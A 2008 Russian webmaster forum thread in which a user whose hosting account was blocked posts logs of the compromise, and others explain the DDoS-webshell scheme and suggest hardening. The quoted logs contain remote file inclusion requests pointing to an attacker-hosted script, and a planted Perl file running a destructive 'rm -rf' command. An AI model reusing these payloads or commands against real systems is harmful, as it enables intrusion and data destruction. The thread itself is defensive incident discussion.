Заблокировали акк на nic.ru

[Veles]

Цитата:

Сообщение от Ufaweb

Хех, вспоминаю высказывание разработчиков IE против FF:
На что файрфоксовцы ответили:

Да, обули IE, красиво...

[админ]

надо ставить даталайф, пока вроде не было взломов лицензионных версий...

[Sway]

да и Joomla версии 1.0.15 не ломали, уязвимости были для версии 1.5.6

вот их ответы:
Специалисты технической поддержки не занимаются редактированием и оптимизацией скриптов клиентов хостинга.
Для Вас доступны множество программ способных выявить и устранить уязвимости в скриптах Ваших сайтов.

Вчера все почистил (были проблемы, доступ от фтп увели, но я вообще всех фтп пользователей удалил, работал только через ssh)? проверял KIS-ом

Доказательства:

Вырезка из логов HTTP сервера:

Not a JPEG file: starts with 0x47 0x49
Not a JPEG file: starts with 0x47 0x49
uptime: /var/run/utmp: No such file or directory
uptime: /var/run/utmp: No such file or directory
uptime: /var/run/utmp: No such file or directory
uptime: /var/run/utmp: No such file or directory
uptime: /var/run/utmp: No such file or directory
uptime: /var/run/utmp: No such file or directory
uptime: /var/run/utmp: No such file or directory
uptime: /var/run/utmp: No such file or directory
sysctl: not found
sysctl: not found
sysctl: not found
sysctl: not found
Not a JPEG file: starts with 0x47 0x49
Not a JPEG file: starts with 0x47 0x49
Not a JPEG file: starts with 0x47 0x49
Out of memory during "large" request for 33558528 bytes, total sbrk() is 185585664 bytes at b1tm.txt line 247.

Файл:
[sway@web08 ~]$ ls -la /tmp/
total 46
drwxrwxrwt 3 root wheel 512 Oct 14 18:35 .
drwxr-xr-x 9 root wheel 512 Apr 5 2008 ..
-rw-r--r-- 1 sway wheel 9268 Oct 14 03:05 cache_7b181b55b55aee36ad5e7bd9d5a091ec_1d11afb4b7f 1fcedc4a94a34be61bc09
-rw-r--r-- 1 sway wheel 11193 Oct 14 03:05 cache_7b181b55b55aee36ad5e7bd9d5a091ec_91820306da0 9e6338290ad963470979b
-rw-r--r-- 1 sway wheel 12583 Oct 14 03:00 cache_7b181b55b55aee36ad5e7bd9d5a091ec_a16bd786796 43aa1cbff766eed8ed54a
drwx------ 2 sway wheel 512 Oct 14 18:35 mc-sway
-rw-r--r-- 1 sway wheel 52 Oct 14 14:30 rm.txt
-rw------- 1 sway wheel 379 Oct 13 21:58 sess_450ae7291c42262cd5783d87bbdc8fc5

Файл удалениея вредосносного ПО был создан Oct 14 14:30

[sway@web08 ~]$ cat /tmp/rm.txt
#!/usr/bin/perl
exec("rm -rf *siti* && rm rm.txt");


Жалоба поступила нам Окт. 14 18:29:17 2008 :
Hack Attempted to our domain www.microcyb.com from IP Address: 194.85.90.37 using host: sway.nichost.ru on 10-14-2008 10:14 am EDT.
Hijacking injection script URL http://www.severo-zapad.ru//i/alb_id.txt? has been reported to the FBI Cyber Crime division.
Date: 10-14-2008
Time: 10:14 am
Time Zone: EDT
Hack IP Address: 194.85.90.37
Port: 80
Hacking Using Host: sway.nichost.ru
Hacking Script URL: http://www.severo-zapad.ru//i/alb_id.txt?

Лог Вашего сайта:
194.85.90.37 - - [14/Oct/2008:17:20:03 +0400] "GET /kb/phpmanual/ref.yaz.htm/modules/newbb_plus/class/forumpollrenderer.php?bbPath%5bpath%5d=http://www.sever
o-zapad.ru//i/alb_id.txt%3f HTTP/1.0" 200 597 "-" "libwww-perl/5.805"
194.85.90.37 - - [14/Oct/2008:17:20:04 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath%5bpath%5d=http://www.severo-zapad.ru//i/alb_id.txt%
3f HTTP/1.0" 200 572 "-" "libwww-perl/5.805"
194.85.90.37 - - [14/Oct/2008:17:20:04 +0400] "GET /kb/phpmanual/modules/newbb_plus/class/forumpollrenderer.php?bbPath%5bpath%5d=http://www.severo-zapad.ru//
i/alb_id.txt%3f HTTP/1.0" 200 585 "-" "libwww-perl/5.805"
194.85.90.37 - - [14/Oct/2008:17:37:37 +0400] "GET /?bbPath%5bpath%5d=http://www.severo-zapad.ru//i/alb_id.txt%3f HTTP/1.0" 200 526 "-" "libwww-perl/5.805"
194.85.90.37 - - [14/Oct/2008:18:02:07 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath%5bpath%5d=http://www.severo-zapad.ru//i/alb_id.txt%
3f HTTP/1.0" 200 572 "-" "libwww-perl/5.805"
194.85.90.37 - - [14/Oct/2008:18:29:36 +0400] "GET /?bbPath%5bpath%5d=http://www.severo-zapad.ru//i/alb_id.txt%3f HTTP/1.0" 200 526 "-" "libwww-perl/5.805"
194.85.90.37 - - [14/Oct/2008:18:29:36 +0400] "GET /?bbPath%5bpath%5d=http://www.severo-zapad.ru//i/alb_id.txt%3f HTTP/1.0" 200 526 "-" "libwww-perl/5.805"

Если эти действия были произведены вами то аккаунт хостинга разблокирован не будет, так как это серьезное нарушение регламента.
Если это действие было произведено не Вами, то Вам необходимо было проверятиь Ваши скрипты на уязвимость, чтобы передупредить данную ситуацию. В данном случае Вами
данное действие выполенно не было. Что повлеко вышеописанные последствия.

Добавлено через 2 минуты
увы, я в этом не силен, все что выше написано, для меня китайская грамота ((

[Renult]

Цитата:

Сообщение от Sway

Если эти действия были произведены вами то аккаунт хостинга разблокирован не будет, так как это серьезное нарушение регламента.
Если это действие было произведено не Вами, то Вам необходимо было проверятиь Ваши скрипты на уязвимость, чтобы передупредить данную ситуацию. В данном случае Вами
данное действие выполенно не было. Что повлеко вышеописанные последствия.

Так сайт включат или нет?

[shr]

Цитата:

Сообщение от Ufaweb

Бред. Если это ДДоС-атака, то как правило жертвы атаки блокируют всю подсеть атакующего. Забыли, как САПА заблочила весь ДЦ из-за атаки с какого-то сервера этого ДЦ?

Почему это бред? Перечитайте сабж, наверное, вы не так поняли. Не ТС ддосили, а его использовали для ддоса.

Хостер не обязан копаться в скриптах юзера. В данном случае поимели именно через что-то у юзера, а не сервер хостера. Что подтверждают логи выше.

Хостер же должен пресекать любые попытки делать гадости на своем оборудовании, что он и сделал.

[imcl]

http://www.severo-zapad.ru//i/alb_id.txt

У Вас есть такой файл на сервере? Через ftp проверьте. Пишут, что атакуют с помощью этого скрипта.

[xsash]

обьясняю тему.

ломают сайт (двиг, трой, брут - не важно)
заливают вебшел/скрипт ddos`а типа "смерч"
далее когда набирается таких шеллов NN штук поднимают скрипт для управления "шеллами клиентами"
появляется цель, отправляются запросы на "клиент шеллы" которые начинают доссить сайт жертву


год или два назад был целый бум на подобные ддос системы и резкий демпинг цен в этой тематике.

плюсы
толстый канал от хостинга
не шибко много затрат

минусы
непродолжительная жизнь - хостер блочит ак пользователя



-----------
расшифрую на русский, что Вам написали.
если Вы специально досите сайт - Вас заблочат перманентно
если это ктото другой - позаботтесь о безопасности сайта сами, если повторится - расстрел через повешивание

[Jooz]

Если не юзаете FTP - закрывайте все порты файром кроме 80 и 25,110, 22 оставить только для себя.
Обратите внимание на запущенные шелы

Цитата:

sway 12169 0.0 0.0 3200 28 p7 S+ Mon05PM 0:00.07 /bin/bash
sway 91764 0.0 0.0 3196 1716 p0 S 6:34PM 0:00.05 /bin/bash
sway 4977 0.0 0.0 3192 28 p2 S+ Sun02PM 0:00.05 /bin/bash
sway 47850 0.0 0.0 3196 28 p5- S 2Oct08 0:00.05 /bin/bash

Это что у вас такое?
Смотрите логи сервера, смотрите не ломанули ли ssh, брутили ли и так далее.
/var/log/security
/var/log/auth.log
Смотрите "sockstat -46", кто у вас висит особенно бурно, также его рубите файром.
В общем вариантов тьма, без пациента диагноз поставить сложно , но для начала все закройте файрволом, дальше последовательно ищите подозрительные процессы. Ну и конечно переконфигурируйте php.ini отубайте системыне команды, типа system, socket, chmod, и т.д.
Все файлы в /home/ рекурсивно в неисполняемые загоните, потом нужные поправите.

[omsknews]

без рута ничего не сделаете ,
а с рутовыми правами
ну как минимум - закройте исходящие от вашего апача наружу (выход на саповские ипишники оставьте чтоб ссылки могло забирать) закройте всем фитипи и шелл, по ip оставьте только себе.

это на уровне пехи можно сделать - фильтраните запросы гетовские к проектам где в кверистринге встречается http ил ftp

[Ulf]

Попросите хостера оторвать Вам perl, Вам просто червя запустили.